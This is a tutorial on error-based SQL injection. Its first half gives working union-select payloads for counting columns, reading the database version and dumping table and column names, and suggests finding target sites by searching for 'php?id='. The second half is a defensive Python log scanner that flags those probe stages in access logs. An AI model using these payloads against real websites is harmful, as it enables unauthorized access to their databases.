As mentioned in the previous post about SQL injection, there are mainly two types of SQL injection: error-based SQL injection and blind SQL injection.
Error-based SQL injection can be performed on the URLs, forms, etc. of a website.
We can search for web pages vulnerable to SQL injection using the following search query:
php?id=
Example: www.example.com/php?id=2
Add a single quote (') at the end of the URL to test the web page for an SQL injection vulnerability.
www.example.com/php?id=2'
If the web page displays an SQL-related error, it is vulnerable to SQL injection.
If it shows an error, then append "order by 1--" to the URL.
www.example.com/php?id=2 order by 1--
Increase the number by 1 each time until the web page loads normally without any error.
We can also try the following technique to identify the number of columns.
php?id=6' order by 3--+
If the URL www.example.com/php?id=2 order by 7-- shows an error, that confirms that the database has 6 columns in it.
Now let us identify the vulnerable columns by appending the query below to the URL.
union select (list of columns)--
Example: union select 1,2,3,4,5,6--
After entering it in the URL, if the system displays any numbers, then those columns are vulnerable. In the above example, if it displays 3 and 4, then those columns are vulnerable.
To find out the version of the database server, replace a column number with version().
www.example.com/php?id=6 union select 1,2,3,version(),4,5,6--
To retrieve database information, including table names:
php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
To extract the column names:
php?id=-1 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=table name
In this way you can check whether a website is vulnerable to SQL injection attacks. The cheat sheet for SQL injection is here.
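From the defender's side, the probe sequence described above (quote test, "order by" counting, "union select", information_schema lookups) leaves a recognizable trail in web server access logs. The following is an added example, not code from the original post: a Python sketch that decodes query strings and flags clients that hit two or more of those stages. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Probe stages in the order the post walks through them.
STAGES = [
    ("quote_probe",   re.compile(r"^\s*-?\d+\s*['’]\s*$")),
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select",  re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_dump",   re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
]
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /php?id=2%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [10/Oct/2024:13:55:41 +0000] "GET /php?id=2%20order%20by%201-- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2024:13:56:02 +0000] "GET /php?id=2+UNION+SELECT+1,2,3,4,5,6-- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2024:13:56:30 +0000] "GET /php?id=-1+union+select+1,2,group_concat(table_name),4,5,6,7+from+information_schema.tables-- HTTP/1.1" 200 5301',
    '198.51.100.4 - - [10/Oct/2024:13:57:00 +0000] "GET /php?id=2 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Oct/2024:13:57:05 +0000] "GET /search?q=order+by+phone HTTP/1.1" 200 900',
]

def classify(value):
    """Return the names of all probe stages a decoded parameter value matches."""
    return [name for name, rx in STAGES if rx.search(value)]

def scan(lines):
    """Map client IP -> probe stages seen, in first-seen order."""
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        ip, target = m.groups()
        # parse_qsl percent-decodes and turns '+' into spaces before matching.
        for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for stage in classify(value):
                if stage not in seen.setdefault(ip, []):
                    seen[ip].append(stage)
    return seen

def suspects(lines, min_stages=2):
    """Clients that progressed through at least min_stages distinct stages."""
    return {ip: st for ip, st in scan(lines).items() if len(st) >= min_stages}

if __name__ == "__main__":
    for ip, stages in suspects(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```

Matching on the decoded value rather than the raw request line is what catches the %20 and + encoded variants; the durable fix remains binding the id parameter in a parameterized query instead of concatenating it into SQL.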